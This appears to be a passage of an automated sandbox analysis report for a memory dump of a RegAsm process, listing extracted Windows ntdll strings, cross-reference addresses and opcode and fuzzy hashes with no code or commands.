                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 028D4899
                                                  • LdrpCheckRedirection, xrefs: 028D488F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-3154609507
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 028D2104
                                                  • LdrpInitializationFailure, xrefs: 028D20FA
                                                  • Process initialization failed with status 0x%08lx, xrefs: 028D20F3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2986994758
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: #%u
                                                  • API String ID: 48624451-232158463
                                                  Strings
                                                  • LdrResSearchResource Exit, xrefs: 0285AA25
                                                  • LdrResSearchResource Enter, xrefs: 0285AA13
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                  • API String ID: 0-4066393604
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$MUI
                                                  • API String ID: 0-17815947
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0285063D
                                                  • kLsE, xrefs: 02850540
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 0-2547482624
                                                  • Opcode ID: ccab8eb4e76f44b5143923737eded28a521569eab6808a305754bddd9cb85874
                                                  • Instruction ID: bfa993340a02095efadba1a3dc06accd12a292d093dfb0996b4b76c26e5b2f19
                                                  • Opcode Fuzzy Hash: ccab8eb4e76f44b5143923737eded28a521569eab6808a305754bddd9cb85874
                                                  • Instruction Fuzzy Hash: DC51BBBD5047668FC724EF68C4406A7B7E5AF88304F00883EE9AAC7241E734E545CF92
                                                  Strings
                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0285A309
                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0285A2FB
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                  • API String ID: 0-2876891731
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 8c4ed8a4df9e170b38ade937d208a25591ff46fdd69d01fd4053406cb8ee2e83
                                                  • Instruction ID: 46f8b93f245ca55a6716ee8470bbfafb50a7c8f6509d7b60ea69f698e21adfb3
                                                  • Opcode Fuzzy Hash: 8c4ed8a4df9e170b38ade937d208a25591ff46fdd69d01fd4053406cb8ee2e83
                                                  • Instruction Fuzzy Hash: AB823B7DE003299BDB24CFA9C880BADB7B5BF48314F14816AEC59EB250D774A981CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: c383c6b25a1e030e874f44d7116877da3ee77becaac8379f375c208676bac7cb
                                                  • Instruction ID: 52447b43acec23d93a49f1bb05e7942c4c6b710885d05400ba1ae1c60b17a259
                                                  • Opcode Fuzzy Hash: c383c6b25a1e030e874f44d7116877da3ee77becaac8379f375c208676bac7cb
                                                  • Instruction Fuzzy Hash: 84918079900229AFEB21DB98DC85FAEB7B9EF04B54F100065F604EB191E774E904CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: bc372c27ec7ed0c1a6ac53bce6c9ea6fc0d869eec8782dd5c4c486b9c692a83a
                                                  • Instruction ID: 7b788a58446977f8a83d3250518a9335afe29886c7012b61a7696a9507b24a9d
                                                  • Opcode Fuzzy Hash: bc372c27ec7ed0c1a6ac53bce6c9ea6fc0d869eec8782dd5c4c486b9c692a83a
                                                  • Instruction Fuzzy Hash: 8191B03E901648BBDB22AFA9DC48FAFBBBAEF45744F140025F605E7260E7349941CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  • Opcode ID: 14e4bb0b815b9cbb2178f9de86e0172443b0f764a9bbfba2cedb445c3974153d
                                                  • Instruction ID: 40752ea1582ee4404dd61e135f81d67cde8172895c4f38af40190992983efc4e
                                                  • Opcode Fuzzy Hash: 14e4bb0b815b9cbb2178f9de86e0172443b0f764a9bbfba2cedb445c3974153d
                                                  • Instruction Fuzzy Hash: 3E714D7DE0422A9BDB18DF98C5906ADBBB6BF88714F24853EE409E7240E734D901CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  • Opcode ID: a890eedf632691cefb2c11c0aa525a5f7685256fcc1a458323e09b431a5b5155
                                                  • Instruction ID: 064ac260fe4c895f3ae486cdb0080ecab5cc757c70d8f37dff963fa52b889fd6
                                                  • Opcode Fuzzy Hash: a890eedf632691cefb2c11c0aa525a5f7685256fcc1a458323e09b431a5b5155
                                                  • Instruction Fuzzy Hash: 21419F7E5183119BD710DA68C888F7BB7E9AF88708F44092DFA89D7140EB74D904CB93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: b344dcd48b007b28903185701576c0bf863342a4dad7b61f6061d4fa0883b459
                                                  • Instruction ID: 685b5ba257ba5402b6c2b41cff6eaefc3216b5c96307e69066926c255bafbc59
                                                  • Opcode Fuzzy Hash: b344dcd48b007b28903185701576c0bf863342a4dad7b61f6061d4fa0883b459
                                                  • Instruction Fuzzy Hash: 8A4143B9D0112CAADF219A54CC84FDEB77DEB44718F1045EAAA08E7140DB709E498FA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: deccba88c6b16e7d8b018c1d8cef726dec84148e25ef213e43bd4d83bf31b8e0
                                                  • Instruction ID: a2830bbe2d72fa60cf9c540ada8fb4c89c51feaaba8c67075fae3f2b04fba986
                                                  • Opcode Fuzzy Hash: deccba88c6b16e7d8b018c1d8cef726dec84148e25ef213e43bd4d83bf31b8e0
                                                  • Instruction Fuzzy Hash: 0A314A3DA007689BEF21CB68C850BAE77ADDF66708F144068E946EB282E775D805CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 2527c3c80e1753737938277850e7ebf76fcd9797f7ff24be4f6f97f5fdaaa118
                                                  • Instruction ID: 3b2d57e3cd3c2f303948f258829e49e765e616765602068e975906f7c145d7c8
                                                  • Opcode Fuzzy Hash: 2527c3c80e1753737938277850e7ebf76fcd9797f7ff24be4f6f97f5fdaaa118
                                                  • Instruction Fuzzy Hash: A931E17E900519AFEB15DA98C855E7FB7B5EB80724F21416EE909E7250D730EE04CBE0
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 028D895E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  • Opcode ID: ed10fa7693efc72fac8a1128d6600216b536c5b026fc0b44dbacbc82c1b96b2a
                                                  • Instruction ID: 15239edd0e25ece77098ad04f08888560ca92955f6c5ca00adffd9ce4554e5a4
                                                  • Opcode Fuzzy Hash: ed10fa7693efc72fac8a1128d6600216b536c5b026fc0b44dbacbc82c1b96b2a
                                                  • Instruction Fuzzy Hash: 78012B3D200314BBE7206F95CC88E6A7BA6EF8536AF050419E986D6551CF20AC4ACB93
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0549b2ee3049d9e1e54e25e9252e756cb5a6bb488000a7633056114763192ce
                                                  • Instruction ID: 1ae8002dc69c59e906c881249c8ce8620dd48574997a35c79c50031ddb402450
                                                  • Opcode Fuzzy Hash: a0549b2ee3049d9e1e54e25e9252e756cb5a6bb488000a7633056114763192ce
                                                  • Instruction Fuzzy Hash: B091027DA00615CBDB25DF68C448FB9B7A2EF88718F158069ED09DB784E734D901CB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf275720d43ff926566679b9a2136827925763e2d240ebcbff979fc53fcc3c11
                                                  • Instruction ID: 627daee9211133a82ec16f1055e15853d480a5df6d27c4cbcd4a6b0bb1bb2f39
                                                  • Opcode Fuzzy Hash: bf275720d43ff926566679b9a2136827925763e2d240ebcbff979fc53fcc3c11
                                                  • Instruction Fuzzy Hash: E1819279A016299FEF14CF69C850ABEB7F9FB48704F08852EE445E7640E734E941CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                  • Instruction ID: 6bccea83141a29b0ebe99e830b3a77a3408dd6cc39d0cb956b7f9a25923bee57
                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                  • Instruction Fuzzy Hash: 61818F75A016099FDF18CFAAC890AAEB7B6FF84314F14856DD8169B384DB74ED01CB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ca94ea3d87e30ba129eadf379f7c5af54df23e4dd0c62615be33671c5c04213
                                                  • Instruction ID: 411c71082079f73c23f713a03ded5d5fe59253476420d232ad595ad29e5253e6
                                                  • Opcode Fuzzy Hash: 6ca94ea3d87e30ba129eadf379f7c5af54df23e4dd0c62615be33671c5c04213
                                                  • Instruction Fuzzy Hash: 83812B79A00609AFDB25DFA9C880BEEB7FAFF88354F144429E559E7250D730AC45CB60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d21c52a281db8334d5a7666ec4b9addfb2778a3294cae1b05fdff095ba37820
                                                  • Instruction ID: ff865b37b0a115744341b2a862cbabac43fdf114ce59a9579cd951df71f86c6a
                                                  • Opcode Fuzzy Hash: 9d21c52a281db8334d5a7666ec4b9addfb2778a3294cae1b05fdff095ba37820
                                                  • Instruction Fuzzy Hash: 5F7199BDC056299BCB268F59C494BBEBBB9FF48704F14451EE896EB350D774A800CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb3669df68501b3811acf11527fd254c35d27f0d327a1a498c2e36f1e7ca1071
                                                  • Instruction ID: a9b3d0bdbc681dcd8331e3746bc3fe35520efd340e10c29ff846583be3d00d2c
                                                  • Opcode Fuzzy Hash: cb3669df68501b3811acf11527fd254c35d27f0d327a1a498c2e36f1e7ca1071
                                                  • Instruction Fuzzy Hash: B2715AB4D44208EFCB10CF9ADA84EAABBFDEF82714F10556AE614EB294C7319900DB54
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 319383bedb96578bffe6bb77189e9838ee11570ca4b08bb569989af80cf5032c
                                                  • Instruction ID: 7423596684d46c62a64b0427ebd5bdccc4a404b4d5ab45dd9a6a7c326be67e4b
                                                  • Opcode Fuzzy Hash: 319383bedb96578bffe6bb77189e9838ee11570ca4b08bb569989af80cf5032c
                                                  • Instruction Fuzzy Hash: 5171BC7D6042518FC311DF28C488B7AB7E6FF88314F0485AAE899CB756EB34D846CB91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b8a201a4f6b408dccc951c8561be23c7b5470a7e1163796017bb691f4ba9d5b
                                                  • Instruction ID: a283ae84ebffd31956319fc3076325b68faaaa28965ef4b33b7ccdf4a406b9ba
                                                  • Opcode Fuzzy Hash: 5b8a201a4f6b408dccc951c8561be23c7b5470a7e1163796017bb691f4ba9d5b
                                                  • Instruction Fuzzy Hash: 0271F43E200711AFDF319F18C844F6AB7EAEF51768F148418E61AC72A0E775E944CB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                  • Instruction ID: 84938d6d67ab9da38b2917cdc470ad3422a7c12f31cde3e89ba79a5116336636
                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                  • Instruction Fuzzy Hash: A3716D79A00609EFDB10DFA9C984EAEBBBAFF48704F104569E905E7250DB34EA45CF50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 692483f97dec34c53d9fbff03eae18820e899bfe2f806604b5476e6e2703bd8c
                                                  • Instruction ID: b53468748e4b32364d7aea7f9e5281684fc757badda60d29b95c5e15bd419787
                                                  • Opcode Fuzzy Hash: 692483f97dec34c53d9fbff03eae18820e899bfe2f806604b5476e6e2703bd8c
                                                  • Instruction Fuzzy Hash: A281AB7EA086158FDB15CF98C480BAEB3B6AF48318F15526EDC04EB395D7349990CF91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d21022262cca75d3ba2dd02178bfdee599648953fc2dd8c38dc03b9a1e7f8693
                                                  • Instruction ID: 3facf7bac32355b6e11de17bb335029fb471074f1cc4310122ef256945641cf9
                                                  • Opcode Fuzzy Hash: d21022262cca75d3ba2dd02178bfdee599648953fc2dd8c38dc03b9a1e7f8693
                                                  • Instruction Fuzzy Hash: 8F713875E00219BFEF15DB94C881FEEBBB9FB04354F104169EA21A6294D774AA05CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 589a2332b42a2c115f374343d46227925d7cce148a1c42d832b2f954c1e52d44
                                                  • Instruction ID: d784c9adae9de0ba4a8402fe3b401804202e6ba13d508986719e08c182239884
                                                  • Opcode Fuzzy Hash: 589a2332b42a2c115f374343d46227925d7cce148a1c42d832b2f954c1e52d44
                                                  • Instruction Fuzzy Hash: 2E51BB76904709AFD711DE68C884E6BB7E9EBC8754F010929BB44DB290D734ED05CBE2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e65b4fa44655fcc7901c27143ebe92d0ed7157ff94bfc03965286bc877a3074
                                                  • Instruction ID: a7bed06b3c7e75a0bd1597331050b05906c35f1baf9da12a1a172a704057fdd1
                                                  • Opcode Fuzzy Hash: 7e65b4fa44655fcc7901c27143ebe92d0ed7157ff94bfc03965286bc877a3074
                                                  • Instruction Fuzzy Hash: 0151AE78900708EBDB60DF5AC880A6BFBF9BF94714F10461ED256D76A0D7B0A545CF90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81d4d9eb618799f68373011d59cde49e2ce25952e37645ecbc53199fbacfe83a
                                                  • Instruction ID: c965cd59111891e936a386fb17b51a2f2abdf932ad157943225c84126678ead9
                                                  • Opcode Fuzzy Hash: 81d4d9eb618799f68373011d59cde49e2ce25952e37645ecbc53199fbacfe83a
                                                  • Instruction Fuzzy Hash: F951277D200A04AFDB21EF68C984E6AB3FAFB08754F5004AAF559D7660D734E940CB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 908c16919c8d41727cf99dbdc165d892a5b73edd2f2b1a4b1c7777398ace3068
                                                  • Instruction ID: 6f3850adfff516f48c9dc6f8fdb96202038f3a31241c54e7902732e7ca0622e8
                                                  • Opcode Fuzzy Hash: 908c16919c8d41727cf99dbdc165d892a5b73edd2f2b1a4b1c7777398ace3068
                                                  • Instruction Fuzzy Hash: B45156796083458FD794DF29D880A6BB7E6BFC8308F48492EF689C7250EB30D905CB52
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                  • Instruction ID: 6d46bda73181266ee0f578a2c0cc13d49d624b7b78b75e38806570948ebfb2fa
                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                  • Instruction Fuzzy Hash: E6515A7DE0425EABDF16DBA8C440BEEBBB6AF45758F044069E905EB240D734DD44CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                  • Instruction ID: f1035cddcafb13d1a0f21768e90a06a84a430641a352009fd441dabe4ba4b630
                                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                  • Instruction Fuzzy Hash: CE51A33DD0021DEFDF219E94C884BAEB7B5AB00368F154665E916FB290D730AE48CB91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac98aefdd16797978f97ee11888f0fe20f006d8153b529f62dcc190dd5bed477
                                                  • Instruction ID: 5542e5121c7b2c6becc34b26e0c4ab7ec522d6a5317ff9f01e5d11bf7f421be5
                                                  • Opcode Fuzzy Hash: ac98aefdd16797978f97ee11888f0fe20f006d8153b529f62dcc190dd5bed477
                                                  • Instruction Fuzzy Hash: E841C370742618ABE729DB2BC894B7BB79FFF81764F048619F85587280DB34D801EA91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 872e2a91ddde51723daeb5ada8ce4a50ef6a0fdc154699a406307a95bed0f499
                                                  • Instruction ID: bbf03fe32fc2be3f2bd0ee12032b3d6e613d0b22ecc7df94f4cbc417a982c5db
                                                  • Opcode Fuzzy Hash: 872e2a91ddde51723daeb5ada8ce4a50ef6a0fdc154699a406307a95bed0f499
                                                  • Instruction Fuzzy Hash: 05516EBE900219DFCB20DF69C980EAEBBBAFB49358B55495AD549E3300D734B905CF90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
